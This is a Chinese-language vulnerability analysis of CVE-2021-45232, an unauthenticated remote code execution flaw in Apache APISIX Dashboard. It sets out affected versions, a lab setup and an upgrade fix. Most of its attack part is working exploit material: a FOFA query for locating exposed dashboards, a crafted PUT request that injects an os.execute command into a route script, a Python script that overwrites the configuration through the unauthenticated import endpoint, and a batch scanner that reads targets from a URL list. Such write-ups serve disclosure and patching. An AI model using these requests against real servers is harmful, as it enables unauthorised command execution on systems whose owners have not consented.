漏洞分析

1 组件介绍

APISIX 是一个高性能、可扩展的微服务 API 网关,基于 nginx(openresty)和 Lua 实现功能,借鉴了 Kong 的思路,将 Kong 底层的关系型数据库(Postgres)替换成了NoSQL 型的 etcd。Apache APISIX Dashboard 设计的目的是让用户通过前端界面尽可能轻松地操作 Apache APISIX。
 

2 漏洞描述

2021年12月28日,Apache APISIX Dashboard 组件存在远程代码执行漏洞的信息,漏洞编号:CVE-2021-45232,漏洞威胁等级:高危。

该漏洞是由于 Apache APISIX Dashboard 有些接口直接使用了 gin 框架导致未授权访问进而可导致远程代码执行,攻击者可利用该漏洞在未授权的情况下,构造恶意数据执行远程代码执行攻击,最终获取服务器最高权限。
 
 

影响范围

Apache APISIX  Dashboard 可能受漏洞影响的资产广泛分布于世界各地,主要集中在中国、美国,国内使用量较多且危害较大需要进一步进行关注。

目前受影响的 Apache APISIX  Dashboard 版本:

2.7≤ Apache APISIX  Dashboard <2.10.1
 
 

fofa搜索语法为

title="Apache APISIX Dashboard"



 

环境搭建

使用docker搭建环境
https://github.com/apache/apisix-docker

修改docker-compose.yml为2.7即可



默认账号密码为admin:admin



1、首先添加一个上游



2、添加一个路由



然后在上游服务选择,我们新建的上游。


 
 

漏洞复现

获取/apisix/admin/migrate/export



构造一个Payload

PUT /apisix/admin/routes/387864323462005443 HTTP/1.1
Host: ip:9000

Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://106.52.5.116:9000/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: -http-session-=1::http.session::e36a9dc03600ce92c8daf29b6a25f5a2
Connection: close
Content-Length: 248

{"uris":["/rce"],"methods":["GET","POST","PUT","DELETE",
"HEAD","OPTIONS","CONNECT","TRACE"],"priority":0,"name":"rce","status":1,"labels":{},"script":"os.execute('touch /tmp/UzJu')",
"upstream_id":"387864007731577539"}



这里有两个地方需要注意,第一就是URL后面routes/后的数字是来自export中的路由ID。

而下面的upstreamid是来自export中的上游ID,如果填错会报找不到upstream_id,然后需要把新的覆盖一下。




要用go写一个什么CRC的校验啥的,这里的话其实直接访问export就可以了,会自动下载一个bak文件。

我们需要直接浏览器访问:

http://ip:9000/apisix/admin/migrate/export,随后会下载一个名为apisix-config.bak的文件。



然后发送请求覆盖。

#!/usr/bin/env python
# -*- coding: UTF-8 -*-

'''
@Project :UzJuSecurityTools
@File    :test.py
@Author  :UzJu
@Date    :2021/12/29 12:24 上午
@Email   :UzJuer@163.com
'''
import httpx
import requests

target = "http://ip:9000"
url = target + "/apisix/admin/migrate/import"
files = {'file': open('./apisix-config.bak', 'rb')}
r = httpx.post(url, data={"mode": "overwrite"}, files=files, proxies="http://127.0.0.1:8080")
print(r.status_code)
print(r.content)



Ps: 上面写了proxies是因为想把流量给到burp,更好的看清楚请求。



随后在路由的地方查看一下,发现成功覆盖了。



看看burp接收到的请求。



然后访问ip:9080/UzJu



随后进入docker查看。


 

POC编写


最开始的POC编写思路,比较简单,既然是没做鉴权,那直接请求export然后判断返回的东西或者返回值是不是200不就可以了,先不考虑后续利用。

/apisix/admin/migrate/export

/apisix/admin/migrate/import

 

#!/usr/bin/env python
# -*- coding: UTF-8 -*-

'''
@Project :UzJuSecurityTools
@File    :CVE-2021-45232_POC.py
@Author  :UzJu
@Date    :2021/12/29 12:03 上午
@Email   :UzJuer@163.com
'''

import requests


class Apache_ApiSix_Poc:
    def __init__(self, url):
        self.url = url + "/apisix/admin/migrate/export"

    def checkVuln(self):
        headers = {
            "Connection": "close"
        }
        try:
            result = requests.get(url=self.url,
                                  headers=headers,
                                  verify=False)
            if '{"Consumers":[]' in result.text:
                print(f"[+]CVE-2021-45232: {self.url}存在漏洞")
        except:
            pass


if __name__ == '__main__':
    with open('./url.txt', 'r') as f:
        for i in f.read().splitlines():
            main = Apache_ApiSix_Poc(i)
            main.checkVuln()



 
 

解决方案

1 如何检测组件系统版本

如果主机中存在该web服务页面,则代表使用了Apache APISIX Dashboard组件。



登录 Apache APISIX Dashboard 平台之后,点击系统信息即可查看版本:


 

2 官方修复建议

当前官方已发布最新版本,建议受影响的用户及时更新升级到最新版本。链接如下:
https://github.com/apache/apisix-dashboard